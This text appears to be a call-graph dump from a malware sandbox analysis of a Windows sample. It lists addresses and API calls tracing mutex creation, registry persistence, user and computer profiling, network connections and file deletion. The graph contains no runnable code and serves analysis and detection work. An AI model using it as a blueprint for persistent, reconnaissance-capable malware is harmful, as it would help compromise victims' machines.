46650->46651 46654 401eea 26 API calls 46650->46654 46677 401f86 46650->46677 46653 41a5be 46651->46653 46653->46632 46654->46650 46656 401fcc 46655->46656 46688 402501 46656->46688 46658 401fea 46659 404468 60 API calls ctype 46658->46659 46659->46636 46662 4021b9 46660->46662 46661 4021e8 46661->46637 46662->46661 46693 40262e 26 API calls _Deallocate 46662->46693 46665 40200a 46664->46665 46666 40203a 46665->46666 46694 402654 26 API calls 46665->46694 46666->46640 46668 40202b 46695 4026ba 26 API calls _Deallocate 46668->46695 46675 446aff _strftime 46670->46675 46671 446b3d 46682 445354 20 API calls _Atexit 46671->46682 46672 446b28 RtlAllocateHeap 46674 41a533 InternetOpenW InternetOpenUrlW 46672->46674 46672->46675 46674->46649 46675->46671 46675->46672 46681 442200 7 API calls 2 library calls 46675->46681 46678 401f8e 46677->46678 46683 402325 46678->46683 46680 401fa4 46680->46650 46681->46675 46682->46674 46684 40232f 46683->46684 46686 40233a 46684->46686 46687 40294a 28 API calls 46684->46687 46686->46680 46687->46686 46689 40250d 46688->46689 46691 40252b 46689->46691 46692 40261a 28 API calls 46689->46692 46691->46658 46692->46691 46693->46661 46694->46668 46695->46666 46696 402bcc 46697 402bd7 46696->46697 46698 402bdf 46696->46698 46714 403315 28 API calls _Deallocate 46697->46714 46699 402beb 46698->46699 46704 4015d3 46698->46704 46701 402bdd 46706 43360d 46704->46706 46705 43a88c ___std_exception_copy 21 API calls 46705->46706 46706->46705 46707 402be9 46706->46707 46710 43362e std::_Facet_Register 46706->46710 46715 442200 7 API calls 2 library calls 46706->46715 46709 433dec std::_Facet_Register 46717 437bd7 RaiseException 46709->46717 46710->46709 46716 437bd7 RaiseException 46710->46716 46713 433e09 46714->46701 46715->46706 46716->46709 46717->46713 46718 4339be 46719 4339ca ___BuildCatchObject 46718->46719 46750 4336b3 46719->46750 46721 4339d1 46722 433b24 46721->46722 46725 4339fb 46721->46725 47050 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46722->47050 46724 433b2b 47051 4426be 28 API calls _Atexit 46724->47051 46735 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46725->46735 47044 4434d1 5 API calls _ValidateLocalCookies 46725->47044 46727 433b31 47052 442670 28 API calls _Atexit 46727->47052 46730 433a14 46732 433a1a 46730->46732 47045 443475 5 API calls _ValidateLocalCookies 46730->47045 46731 433b39 46734 433a9b 46761 433c5e 46734->46761 46735->46734 47046 43edf4 38 API calls 3 library calls 46735->47046 46744 433abd 46744->46724 46745 433ac1 46744->46745 46746 433aca 46745->46746 47048 442661 28 API calls _Atexit 46745->47048 47049 433842 13 API calls 2 library calls 46746->47049 46749 433ad2 46749->46732 46751 4336bc 46750->46751 47053 433e0a IsProcessorFeaturePresent 46751->47053 46753 4336c8 47054 4379ee 10 API calls 3 library calls 46753->47054 46755 4336cd 46756 4336d1 46755->46756 47055 44335e 46755->47055 46756->46721 46759 4336e8 46759->46721 47123 436050 46761->47123 46764 433aa1 46765 443422 46764->46765 47125 44ddc9 46765->47125 46767 44342b 46768 433aaa 46767->46768 47129 44e0d3 38 API calls 46767->47129 46770 40d767 46768->46770 47131 41bce3 LoadLibraryA GetProcAddress 46770->47131 46772 40d783 GetModuleFileNameW 47136 40e168 46772->47136 46774 40d79f 46775 401fbd 28 API calls 46774->46775 46776 40d7ae 46775->46776 46777 401fbd 28 API calls 46776->46777 46778 40d7bd 46777->46778 47151 41afc3 46778->47151 46782 40d7cf 46783 401d8c 26 API calls 46782->46783 46784 40d7d8 46783->46784 46785 40d835 46784->46785 46786 40d7eb 46784->46786 47176 401d64 46785->47176 47430 40e986 111 API calls 46786->47430 46789 40d845 46792 401d64 28 API calls 46789->46792 46790 40d7fd 46791 401d64 28 API calls 46790->46791 46795 40d809 46791->46795 46793 40d864 46792->46793 47181 404cbf 46793->47181 47431 40e937 68 API calls 46795->47431 46796 40d873 47185 405ce6 46796->47185 46799 40d87f 47188 401eef 46799->47188 46800 40d824 47432 40e155 68 API calls 46800->47432 46803 40d88b 46804 401eea 26 API calls 46803->46804 46806 40d894 46804->46806 46805 401eea 26 API calls 46808 40dc9f 46805->46808 46807 401eea 26 API calls 46806->46807 46809 40d89d 46807->46809 47047 433c94 GetModuleHandleW 46808->47047 46810 401d64 28 API calls 46809->46810 46811 40d8a6 46810->46811 47192 401ebd 46811->47192 46813 40d8b1 46814 401d64 28 API calls 46813->46814 46815 40d8ca 46814->46815 46816 401d64 28 API calls 46815->46816 46818 40d8e5 46816->46818 46817 40d946 46820 401d64 28 API calls 46817->46820 46835 40e134 46817->46835 46818->46817 47433 4085b4 46818->47433 46825 40d95d 46820->46825 46821 40d912 46822 401eef 26 API calls 46821->46822 46823 40d91e 46822->46823 46826 401eea 26 API calls 46823->46826 46824 40d9a4 47196 40bed7 46824->47196 46825->46824 46830 4124b7 3 API calls 46825->46830 46827 40d927 46826->46827 47437 4124b7 RegOpenKeyExA 46827->47437 46829 40d9aa 46831 40d82d 46829->46831 47199 41a463 46829->47199 46836 40d988 46830->46836 46831->46805 46834 40d9c5 46837 40da18 46834->46837 47216 40697b 46834->47216 47515 412902 30 API calls 46835->47515 46836->46824 47440 412902 30 API calls 46836->47440 46839 401d64 28 API calls 46837->46839 46842 40da21 46839->46842 46851 40da32 46842->46851 46852 40da2d 46842->46852 46844 40e14a 47516 4112b5 64 API calls ___scrt_fastfail 46844->47516 46845 40d9e4 47441 40699d 30 API calls 46845->47441 46846 40d9ee 46848 401d64 28 API calls 46846->46848 46859 40d9f7 46848->46859 46854 401d64 28 API calls 46851->46854 47444 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46852->47444 46853 40d9e9 47442 4064d0 97 API calls 46853->47442 46857 40da3b 46854->46857 47220 41ae08 46857->47220 46859->46837 46862 40da13 46859->46862 46860 40da46 47224 401e18 46860->47224 47443 4064d0 97 API calls 46862->47443 46863 40da51 47228 401e13 46863->47228 46866 40da5a 46867 401d64 28 API calls 46866->46867 46868 40da63 46867->46868 46869 401d64 28 API calls 46868->46869 46870 40da7d 46869->46870 46871 401d64 28 API calls 46870->46871 46872 40da97 46871->46872 46873 401d64 28 API calls 46872->46873 46875 40dab0 46873->46875 46874 40db1d 46877 40db2c 46874->46877 46883 40dcaa ___scrt_fastfail 46874->46883 46875->46874 46876 401d64 28 API calls 46875->46876 46881 40dac5 _wcslen 46876->46881 46878 40db35 46877->46878 46906 40dbb1 ___scrt_fastfail 46877->46906 46879 401d64 28 API calls 46878->46879 46880 40db3e 46879->46880 46882 401d64 28 API calls 46880->46882 46881->46874 46884 401d64 28 API calls 46881->46884 46885 40db50 46882->46885 47504 41265d RegOpenKeyExA 46883->47504 46886 40dae0 46884->46886 46888 401d64 28 API calls 46885->46888 46889 401d64 28 API calls 46886->46889 46890 40db62 46888->46890 46891 40daf5 46889->46891 46894 401d64 28 API calls 46890->46894 47445 40c89e 46891->47445 46892 40dcef 46893 401d64 28 API calls 46892->46893 46895 40dd16 46893->46895 46897 40db8b 46894->46897 47242 401f66 46895->47242 46900 401d64 28 API calls 46897->46900 46899 401e18 26 API calls 46902 40db14 46899->46902 46903 40db9c 46900->46903 46905 401e13 26 API calls 46902->46905 47502 40bc67 45 API calls _wcslen 46903->47502 46904 40dd25 47246 4126d2 RegCreateKeyA 46904->47246 46905->46874 47232 4128a2 46906->47232 46910 40dc45 ctype 46915 401d64 28 API calls 46910->46915 46911 40dbac 46911->46906 46913 401d64 28 API calls 46914 40dd47 46913->46914 47252 43a5e7 46914->47252 46916 40dc5c 46915->46916 46916->46892 46919 40dc70 46916->46919 46922 401d64 28 API calls 46919->46922 46920 40dd5e 47507 41beb0 86 API calls ___scrt_fastfail 46920->47507 46921 40dd81 46926 401f66 28 API calls 46921->46926 46924 40dc7e 46922->46924 46927 41ae08 28 API calls 46924->46927 46925 40dd65 CreateThread 46925->46921 48199 41c96f 10 API calls 46925->48199 46928 40dd96 46926->46928 46929 40dc87 46927->46929 46930 401f66 28 API calls 46928->46930 47503 40e219 109 API calls 46929->47503 46932 40dda5 46930->46932 47256 41a686 46932->47256 46933 40dc8c 46933->46892 46935 40dc93 46933->46935 46935->46831 46937 401d64 28 API calls 46938 40ddb6 46937->46938 46939 401d64 28 API calls 46938->46939 46940 40ddcb 46939->46940 46941 401d64 28 API calls 46940->46941 46942 40ddeb 46941->46942 46943 43a5e7 _strftime 42 API calls 46942->46943 46944 40ddf8 46943->46944 46945 401d64 28 API calls 46944->46945 46946 40de03 46945->46946 46947 401d64 28 API calls 46946->46947 46948 40de14 46947->46948 46949 401d64 28 API calls 46948->46949 46950 40de29 46949->46950 46951 401d64 28 API calls 46950->46951 46952 40de3a 46951->46952 46953 40de41 StrToIntA 46952->46953 47280 409517 46953->47280 46956 401d64 28 API calls 46957 40de5c 46956->46957 46958 40dea1 46957->46958 46959 40de68 46957->46959 46962 401d64 28 API calls 46958->46962 47508 43360d 22 API calls 3 library calls 46959->47508 46961 40de71 46963 401d64 28 API calls 46961->46963 46964 40deb1 46962->46964 46965 40de84 46963->46965 46966 40def9 46964->46966 46967 40debd 46964->46967 46968 40de8b CreateThread 46965->46968 46970 401d64 28 API calls 46966->46970 47509 43360d 22 API calls 3 library calls 46967->47509 46968->46958 48197 419128 102 API calls 2 library calls 46968->48197 46972 40df02 46970->46972 46971 40dec6 46973 401d64 28 API calls 46971->46973 46975 40df6c 46972->46975 46976 40df0e 46972->46976 46974 40ded8 46973->46974 46977 40dedf CreateThread 46974->46977 46978 401d64 28 API calls 46975->46978 46979 401d64 28 API calls 46976->46979 46977->46966 48196 419128 102 API calls 2 library calls 46977->48196 46980 40df75 46978->46980 46981 40df1e 46979->46981 46982 40df81 46980->46982 46983 40dfba 46980->46983 46984 401d64 28 API calls 46981->46984 46985 401d64 28 API calls 46982->46985 47305 41a7a2 GetComputerNameExW GetUserNameW 46983->47305 46986 40df33 46984->46986 46988 40df8a 46985->46988 47510 40c854 31 API calls 46986->47510 46994 401d64 28 API calls 46988->46994 46990 401e18 26 API calls 46991 40dfce 46990->46991 46993 401e13 26 API calls 46991->46993 46996 40dfd7 46993->46996 46997 40df9f 46994->46997 46995 40df46 46998 401e18 26 API calls 46995->46998 46999 40dfe0 SetProcessDEPPolicy 46996->46999 47000 40dfe3 CreateThread 46996->47000 47007 43a5e7 _strftime 42 API calls 46997->47007 47001 40df52 46998->47001 46999->47000 47002 40e004 47000->47002 47003 40dff8 CreateThread 47000->47003 48168 40e54f 47000->48168 47004 401e13 26 API calls 47001->47004 47005 40e019 47002->47005 47006 40e00d CreateThread 47002->47006 47003->47002 48198 410f36 137 API calls 47003->48198 47008 40df5b CreateThread 47004->47008 47010 40e073 47005->47010 47012 401f66 28 API calls 47005->47012 47006->47005 48200 411524 38 API calls ___scrt_fastfail 47006->48200 47009 40dfac 47007->47009 47008->46975 48195 40196b 49 API calls _strftime 47008->48195 47511 40b95c 7 API calls 47009->47511 47316 41246e RegOpenKeyExA 47010->47316 47013 40e046 47012->47013 47512 404c9e 28 API calls 47013->47512 47016 40e053 47018 401f66 28 API calls 47016->47018 47020 40e062 47018->47020 47019 40e12a 47328 40cbac 47019->47328 47023 41a686 79 API calls 47020->47023 47022 41ae08 28 API calls 47025 40e0a4 47022->47025 47026 40e067 47023->47026 47319 412584 RegOpenKeyExW 47025->47319 47028 401eea 26 API calls 47026->47028 47028->47010 47031 401e13 26 API calls 47034 40e0c5 47031->47034 47032 40e0ed DeleteFileW 47033 40e0f4 47032->47033 47032->47034 47036 41ae08 28 API calls 47033->47036 47034->47032 47034->47033 47035 40e0db Sleep 47034->47035 47513 401e07 47035->47513 47038 40e104 47036->47038 47324 41297a RegOpenKeyExW 47038->47324 47040 40e117 47041 401e13 26 API calls 47040->47041 47042 40e121 47041->47042 47043 401e13 26 API calls 47042->47043 47043->47019 47044->46730 47045->46735 47046->46734 47047->46744 47048->46746 47049->46749 47050->46724 47051->46727 47052->46731 47053->46753 47054->46755 47059 44e949 47055->47059 47058 437a17 8 API calls 3 library calls 47058->46756 47062 44e966 47059->47062 47063 44e962 47059->47063 47061 4336da 47061->46759 47061->47058 47062->47063 47065 4489ad 47062->47065 47077 433d2c 47063->47077 47066 4489b9 ___BuildCatchObject 47065->47066 47084 444acc EnterCriticalSection 47066->47084 47068 4489c0 47085 44ef64 47068->47085 47070 4489cf 47075 4489de 47070->47075 47098 448841 29 API calls 47070->47098 47073 4489d9 47099 4488f7 GetStdHandle GetFileType 47073->47099 47100 4489fa LeaveCriticalSection std::_Lockit::~_Lockit 47075->47100 47076 4489ef __fread_nolock 47076->47062 47078 433d37 IsProcessorFeaturePresent 47077->47078 47079 433d35 47077->47079 47081 4341a4 47078->47081 47079->47061 47122 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47081->47122 47083 434287 47083->47061 47084->47068 47086 44ef70 ___BuildCatchObject 47085->47086 47087 44ef94 47086->47087 47088 44ef7d 47086->47088 47101 444acc EnterCriticalSection 47087->47101 47109 445354 20 API calls _Atexit 47088->47109 47091 44ef82 47110 43a827 26 API calls _Deallocate 47091->47110 47093 44ef8c __fread_nolock 47093->47070 47094 44efcc 47111 44eff3 LeaveCriticalSection std::_Lockit::~_Lockit 47094->47111 47096 44efa0 47096->47094 47102 44eeb5 47096->47102 47098->47073 47099->47075 47100->47076 47101->47096 47112 448706 47102->47112 47104 44eed4 47106 446ac5 _free 20 API calls 47104->47106 47105 44eec7 47105->47104 47119 44772e 11 API calls 2 library calls 47105->47119 47107 44ef26 47106->47107 47107->47096 47109->47091 47110->47093 47111->47093 47118 448713 _strftime 47112->47118 47113 448753 47121 445354 20 API calls _Atexit 47113->47121 47114 44873e RtlAllocateHeap 47116 448751 47114->47116 47114->47118 47116->47105 47118->47113 47118->47114 47120 442200 7 API calls 2 library calls 47118->47120 47119->47105 47120->47118 47121->47116 47122->47083 47124 433c71 GetStartupInfoW 47123->47124 47124->46764 47126 44dddb 47125->47126 47127 44ddd2 47125->47127 47126->46767 47130 44dcc8 51 API calls 4 library calls 47127->47130 47129->46767 47130->47126 47132 41bd22 LoadLibraryA GetProcAddress 47131->47132 47133 41bd12 GetModuleHandleA GetProcAddress 47131->47133 47134 41bd4b 32 API calls 47132->47134 47135 41bd3b LoadLibraryA GetProcAddress 47132->47135 47133->47132 47134->46772 47135->47134 47517 41a63f FindResourceA 47136->47517 47139 43a88c ___std_exception_copy 21 API calls 47140 40e192 ctype 47139->47140 47141 401f86 28 API calls 47140->47141 47142 40e1ad 47141->47142 47143 401eef 26 API calls 47142->47143 47144 40e1b8 47143->47144 47145 401eea 26 API calls 47144->47145 47146 40e1c1 47145->47146 47147 43a88c ___std_exception_copy 21 API calls 47146->47147 47148 40e1d2 ctype 47147->47148 47520 406052 47148->47520 47150 40e205 47150->46774 47171 41afd6 47151->47171 47152 41b046 47153 401eea 26 API calls 47152->47153 47154 41b078 47153->47154 47156 401eea 26 API calls 47154->47156 47155 41b048 47157 403b60 28 API calls 47155->47157 47159 41b080 47156->47159 47161 41b054 47157->47161 47160 401eea 26 API calls 47159->47160 47162 40d7c6 47160->47162 47163 401eef 26 API calls 47161->47163 47172 40e8bd 47162->47172 47165 41b05d 47163->47165 47164 401eef 26 API calls 47164->47171 47166 401eea 26 API calls 47165->47166 47168 41b065 47166->47168 47167 401eea 26 API calls 47167->47171 47527 41bfa9 28 API calls 47168->47527 47171->47152 47171->47155 47171->47164 47171->47167 47523 403b60 47171->47523 47526 41bfa9 28 API calls 47171->47526 47173 40e8ca 47172->47173 47175 40e8da 47173->47175 47544 40200a 26 API calls 47173->47544 47175->46782 47177 401d6c 47176->47177 47179 401d74 47177->47179 47545 401fff 28 API calls 47177->47545 47179->46789 47182 404ccb 47181->47182 47546 402e78 47182->47546 47184 404cee 47184->46796 47555 404bc4 47185->47555 47187 405cf4 47187->46799 47189 401efe 47188->47189 47191 401f0a 47189->47191 47564 4021b9 26 API calls 47189->47564 47191->46803 47194 401ec9 47192->47194 47193 401ee4 47193->46813 47194->47193 47195 402325 28 API calls 47194->47195 47195->47193 47565 401e8f 47196->47565 47198 40bee1 CreateMutexA GetLastError 47198->46829 47567 41b15b 47199->47567 47204 401eef 26 API calls 47205 41a49f 47204->47205 47206 401eea 26 API calls 47205->47206 47207 41a4a7 47206->47207 47208 41a4fa 47207->47208 47209 412513 31 API calls 47207->47209 47208->46834 47210 41a4cd 47209->47210 47211 41a4d8 StrToIntA 47210->47211 47212 41a4ef 47211->47212 47213 41a4e6 47211->47213 47214 401eea 26 API calls 47212->47214 47575 41c102 28 API calls 47213->47575 47214->47208 47217 40698f 47216->47217 47218 4124b7 3 API calls 47217->47218 47219 406996 47218->47219 47219->46845 47219->46846 47221 41ae1c 47220->47221 47576 40b027 47221->47576 47223 41ae24 47223->46860 47225 401e27 47224->47225 47227 401e33 47225->47227 47585 402121 26 API calls 47225->47585 47227->46863 47230 402121 47228->47230 47229 402150 47229->46866 47230->47229 47586 402718 26 API calls _Deallocate 47230->47586 47233 4128c0 47232->47233 47234 406052 28 API calls 47233->47234 47235 4128d5 47234->47235 47236 401fbd 28 API calls 47235->47236 47237 4128e5 47236->47237 47238 4126d2 29 API calls 47237->47238 47239 4128ef 47238->47239 47240 401eea 26 API calls 47239->47240 47241 4128fc 47240->47241 47241->46910 47243 401f6e 47242->47243 47587 402301 47243->47587 47247 412722 47246->47247 47248 4126eb 47246->47248 47249 401eea 26 API calls 47247->47249 47251 4126fd RegSetValueExA RegCloseKey 47248->47251 47250 40dd3b 47249->47250 47250->46913 47251->47247 47253 43a600 _strftime 47252->47253 47591 43993e 47253->47591 47257 41a737 47256->47257 47258 41a69c GetLocalTime 47256->47258 47259 401eea 26 API calls 47257->47259 47260 404cbf 28 API calls 47258->47260 47262 41a73f 47259->47262 47261 41a6de 47260->47261 47263 405ce6 28 API calls 47261->47263 47264 401eea 26 API calls 47262->47264 47265 41a6ea 47263->47265 47266 40ddaa 47264->47266 47625 4027cb 47265->47625 47266->46937 47268 41a6f6 47269 405ce6 28 API calls 47268->47269 47270 41a702 47269->47270 47628 406478 76 API calls 47270->47628 47272 41a710 47273 401eea 26 API calls 47272->47273 47274 41a71c 47273->47274 47275 401eea 26 API calls 47274->47275 47276 41a725 47275->47276 47277 401eea 26 API calls 47276->47277 47278 41a72e 47277->47278 47279 401eea 26 API calls 47278->47279 47279->47257 47281 409536 _wcslen 47280->47281 47282 409541 47281->47282 47283 409558 47281->47283 47284 40c89e 31 API calls 47282->47284 47285 40c89e 31 API calls 47283->47285 47286 409549 47284->47286 47287 409560 47285->47287 47288 401e18 26 API calls 47286->47288 47289 401e18 26 API calls 47287->47289 47290 409553 47288->47290 47291 40956e 47289->47291 47293 401e13 26 API calls 47290->47293 47292 401e13 26 API calls 47291->47292 47294 409576 47292->47294 47295 4095ad 47293->47295 47648 40856b 28 API calls 47294->47648 47633 409837 47295->47633 47298 409588 47649 4028cf 47298->47649 47301 409593 47302 401e18 26 API calls 47301->47302 47303 40959d 47302->47303 47304 401e13 26 API calls 47303->47304 47304->47290 47828 403b40 47305->47828 47309 41a7fd 47310 4028cf 28 API calls 47309->47310 47311 41a807 47310->47311 47312 401e13 26 API calls 47311->47312 47313 41a810 47312->47313 47314 401e13 26 API calls 47313->47314 47315 40dfc3 47314->47315 47315->46990 47317 41248f RegQueryValueExA RegCloseKey 47316->47317 47318 40e08b 47316->47318 47317->47318 47318->47019 47318->47022 47320 4125b0 RegQueryValueExW RegCloseKey 47319->47320 47321 4125dd 47319->47321 47320->47321 47322 403b40 28 API calls 47321->47322 47323 40e0ba 47322->47323 47323->47031 47325 412992 RegDeleteValueW 47324->47325 47326 4129a6 47324->47326 47325->47326 47327 4129a2 47325->47327 47326->47040 47327->47040 47329 40cbc5 47328->47329 47330 41246e 3 API calls 47329->47330 47331 40cbcc 47330->47331 47335 40cbeb 47331->47335 47850 401602 47331->47850 47333 40cbd9 47853 4127d5 RegCreateKeyA 47333->47853 47336 413fd4 47335->47336 47337 413feb 47336->47337 47870 41aa73 47337->47870 47339 413ff6 47340 401d64 28 API calls 47339->47340 47341 41400f 47340->47341 47342 43a5e7 _strftime 42 API calls 47341->47342 47343 41401c 47342->47343 47344 414021 Sleep 47343->47344 47345 41402e 47343->47345 47344->47345 47346 401f66 28 API calls 47345->47346 47347 41403d 47346->47347 47348 401d64 28 API calls 47347->47348 47349 41404b 47348->47349 47350 401fbd 28 API calls 47349->47350 47351 414053 47350->47351 47352 41afc3 28 API calls 47351->47352 47353 41405b 47352->47353 47874 404262 WSAStartup 47353->47874 47355 414065 47356 401d64 28 API calls 47355->47356 47357 41406e 47356->47357 47358 401d64 28 API calls 47357->47358 47406 4140ed 47357->47406 47359 414087 47358->47359 47360 401d64 28 API calls 47359->47360 47362 414098 47360->47362 47361 401fbd 28 API calls 47361->47406 47364 401d64 28 API calls 47362->47364 47363 41afc3 28 API calls 47363->47406 47365 4140a9 47364->47365 47367 401d64 28 API calls 47365->47367 47366 4085b4 28 API calls 47366->47406 47368 4140ba 47367->47368 47370 401d64 28 API calls 47368->47370 47369 401eef 26 API calls 47369->47406 47371 4140cb 47370->47371 47372 401d64 28 API calls 47371->47372 47374 4140dd 47372->47374 47373 401eea 26 API calls 47373->47406 48008 404101 87 API calls 47374->48008 47376 401d64 28 API calls 47376->47406 47378 414244 WSAGetLastError 48009 41bc76 30 API calls 47378->48009 47383 401f66 28 API calls 47428 414259 47383->47428 47385 41a686 79 API calls 47385->47428 47387 404cbf 28 API calls 47387->47406 47388 401d64 28 API calls 47388->47428 47389 401d8c 26 API calls 47389->47428 47390 405ce6 28 API calls 47390->47406 47391 43a5e7 _strftime 42 API calls 47392 414b80 Sleep 47391->47392 47392->47428 47393 4027cb 28 API calls 47393->47406 47394 401f66 28 API calls 47394->47406 47395 41a686 79 API calls 47395->47406 47398 4082dc 28 API calls 47398->47406 47399 440c51 26 API calls 47399->47406 47400 41265d 3 API calls 47400->47406 47401 412513 31 API calls 47401->47406 47402 403b40 28 API calls 47402->47406 47406->47361 47406->47363 47406->47366 47406->47369 47406->47373 47406->47376 47406->47378 47406->47387 47406->47390 47406->47393 47406->47394 47406->47395 47406->47398 47406->47399 47406->47400 47406->47401 47406->47402 47407 41ad46 28 API calls 47406->47407 47408 401d64 28 API calls 47406->47408 47406->47428 47875 413f9a 47406->47875 47880 4041f1 47406->47880 47887 404915 47406->47887 47902 40428c connect 47406->47902 47962 41a96d 47406->47962 47965 413683 47406->47965 47968 40cbf1 47406->47968 47974 41adee 47406->47974 47977 41aec8 47406->47977 47407->47406 47409 4144ed GetTickCount 47408->47409 47410 41ad46 28 API calls 47409->47410 47423 414507 47410->47423 47412 41ad46 28 API calls 47412->47423 47414 41aec8 28 API calls 47414->47423 47417 40275c 28 API calls 47417->47423 47418 405ce6 28 API calls 47418->47423 47419 4027cb 28 API calls 47419->47423 47421 401eea 26 API calls 47421->47423 47422 401e13 26 API calls 47422->47423 47423->47412 47423->47414 47423->47417 47423->47418 47423->47419 47423->47421 47423->47422 47981 41aca0 47423->47981 47983 41ac52 47423->47983 47988 40e679 GetLocaleInfoA 47423->47988 47991 4027ec 28 API calls 47423->47991 47992 4045d5 47423->47992 48011 404468 60 API calls ctype 47423->48011 47426 414b22 CreateThread 47426->47428 48161 419e89 103 API calls 47426->48161 47427 401eea 26 API calls 47427->47428 47428->47383 47428->47385 47428->47388 47428->47389 47428->47391 47428->47406 47428->47426 47428->47427 47429 401e13 26 API calls 47428->47429 48010 404c9e 28 API calls 47428->48010 48012 40a767 84 API calls 47428->48012 48013 4047eb 98 API calls 47428->48013 47429->47428 47430->46790 47431->46800 47434 4085c0 47433->47434 47435 402e78 28 API calls 47434->47435 47436 4085e4 47435->47436 47436->46821 47438 4124e1 RegQueryValueExA RegCloseKey 47437->47438 47439 41250b 47437->47439 47438->47439 47439->46817 47440->46824 47441->46853 47442->46846 47443->46837 47444->46851 47446 40c8ba 47445->47446 47447 40c8da 47446->47447 47448 40c90f 47446->47448 47449 40c8d0 47446->47449 48162 41a74b 29 API calls 47447->48162 47452 41b15b GetCurrentProcess 47448->47452 47451 40ca03 GetLongPathNameW 47449->47451 47455 403b40 28 API calls 47451->47455 47453 40c914 47452->47453 47456 40c918 47453->47456 47457 40c96a 47453->47457 47454 40c8e3 47458 401e18 26 API calls 47454->47458 47459 40ca18 47455->47459 47461 403b40 28 API calls 47456->47461 47460 403b40 28 API calls 47457->47460 47462 40c8ed 47458->47462 47463 403b40 28 API calls 47459->47463 47465 40c978 47460->47465 47466 40c926 47461->47466 47468 401e13 26 API calls 47462->47468 47464 40ca27 47463->47464 48165 40cc37 28 API calls 47464->48165 47471 403b40 28 API calls 47465->47471 47472 403b40 28 API calls 47466->47472 47468->47449 47469 40ca3a 48166 402860 28 API calls 47469->48166 47474 40c98e 47471->47474 47475 40c93c 47472->47475 47473 40ca45 48167 402860 28 API calls 47473->48167 48164 402860 28 API calls 47474->48164 48163 402860 28 API calls 47475->48163 47479 40ca4f 47482 401e13 26 API calls 47479->47482 47480 40c999 47483 401e18 26 API calls 47480->47483 47481 40c947 47484 401e18 26 API calls 47481->47484 47485 40ca59 47482->47485 47486 40c9a4 47483->47486 47487 40c952 47484->47487 47488 401e13 26 API calls 47485->47488 47489 401e13 26 API calls 47486->47489 47490 401e13 26 API calls 47487->47490 47491 40ca62 47488->47491 47492 40c9ad 47489->47492 47493 40c95b 47490->47493 47494 401e13 26 API calls 47491->47494 47495 401e13 26 API calls 47492->47495 47496 401e13 26 API calls 47493->47496 47497 40ca6b 47494->47497 47495->47462 47496->47462 47498 401e13 26 API calls 47497->47498 47499 40ca74 47498->47499 47500 401e13 26 API calls 47499->47500 47501 40ca7d 47500->47501 47501->46899 47502->46911 47503->46933 47505 412683 RegQueryValueExA RegCloseKey 47504->47505 47506 4126a7 47504->47506 47505->47506 47506->46892 47507->46925 47508->46961 47509->46971 47510->46995 47511->46983 47512->47016 47514 401e0c 47513->47514 47515->46844 47518 40e183 47517->47518 47519 41a65c LoadResource LockResource SizeofResource 47517->47519 47518->47139 47519->47518 47521 401f86 28 API calls 47520->47521 47522 406066 47521->47522 47522->47150 47528 403c30 47523->47528 47526->47171 47527->47152 47529 403c39 47528->47529 47532 403c59 47529->47532 47533 403c68 47532->47533 47538 4032a4 47533->47538 47535 403c74 47536 402325 28 API calls 47535->47536 47537 403b73 47536->47537 47537->47171 47539 4032b0 47538->47539 47540 4032ad 47538->47540 47543 4032b6 28 API calls 47539->47543 47540->47535 47544->47175 47547 402e85 47546->47547 47548 402ea9 47547->47548 47549 402e98 47547->47549 47551 402eae 47547->47551 47548->47184 47553 403445 28 API calls 47549->47553 47551->47548 47554 40225b 26 API calls 47551->47554 47553->47548 47554->47548 47556 404bd0 47555->47556 47559 40245c 47556->47559 47558 404be4 47558->47187 47560 402469 47559->47560 47561 402478 47560->47561 47563 402ad3 28 API calls 47560->47563 47561->47558 47563->47561 47564->47191 47566 401e94 47565->47566 47568 41a471 47567->47568 47569 41b168 GetCurrentProcess 47567->47569 47570 412513 RegOpenKeyExA 47568->47570 47569->47568 47571 412541 RegQueryValueExA RegCloseKey 47570->47571 47572 412569 47570->47572 47571->47572 47573 401f66 28 API calls 47572->47573 47574 41257e 47573->47574 47574->47204 47575->47212 47577 40b02f 47576->47577 47580 40b04b 47577->47580 47579 40b045 47579->47223 47581 40b055 47580->47581 47583 40b060 47581->47583 47584 40b138 28 API calls 47581->47584 47583->47579 47584->47583 47585->47227 47586->47229 47588 40230d 47587->47588 47589 402325 28 API calls 47588->47589 47590 401f80 47589->47590 47590->46904 47609 43a545 47591->47609 47593 43998b 47618 4392de 38 API calls 3 library calls 47593->47618 47595 439950 47595->47593 47596 439965 47595->47596 47608 40dd54 47595->47608 47616 445354 20 API calls _Atexit 47596->47616 47598 43996a 47617 43a827 26 API calls _Deallocate 47598->47617 47601 439997 47603 4399c6 47601->47603 47619 43a58a 42 API calls __Toupper 47601->47619 47602 439a32 47621 43a4f1 26 API calls 2 library calls 47602->47621 47603->47602 47620 43a4f1 26 API calls 2 library calls 47603->47620 47606 439af9 _strftime 47606->47608 47622 445354 20 API calls _Atexit 47606->47622 47608->46920 47608->46921 47610 43a54a 47609->47610 47611 43a55d 47609->47611 47623 445354 20 API calls _Atexit 47610->47623 47611->47595 47613 43a54f 47624 43a827 26 API calls _Deallocate 47613->47624 47615 43a55a 47615->47595 47616->47598 47617->47608 47618->47601 47619->47601 47620->47602 47621->47606 47622->47608 47623->47613 47624->47615 47629 401e9b 47625->47629 47627 4027d9 47627->47268 47628->47272 47630 401ea7 47629->47630 47631 40245c 28 API calls 47630->47631 47632 401eb9 47631->47632 47632->47627 47634 409855 47633->47634 47635 4124b7 3 API calls 47634->47635 47636 40985c 47635->47636 47637 409870 47636->47637 47638 40988a 47636->47638 47640 4095cf 47637->47640 47641 409875 47637->47641 47652 4082dc 47638->47652 47640->46956 47643 4082dc 28 API calls 47641->47643 47644 409883 47643->47644 47678 409959 29 API calls 47644->47678 47647 409888 47647->47640 47648->47298 47819 402d8b 47649->47819 47651 4028dd 47651->47301 47653 4082eb 47652->47653 47679 408431 47653->47679 47655 408309 47656 4098a5 47655->47656 47684 40affa 47656->47684 47659 4098f6 47661 401f66 28 API calls 47659->47661 47660 4098ce 47662 401f66 28 API calls 47660->47662 47663 409901 47661->47663 47664 4098d8 47662->47664 47665 401f66 28 API calls 47663->47665 47666 41ae08 28 API calls 47664->47666 47668 409910 47665->47668 47667 4098e6 47666->47667 47688 40a876 31 API calls ___std_exception_copy 47667->47688 47670 41a686 79 API calls 47668->47670 47672 409915 CreateThread 47670->47672 47671 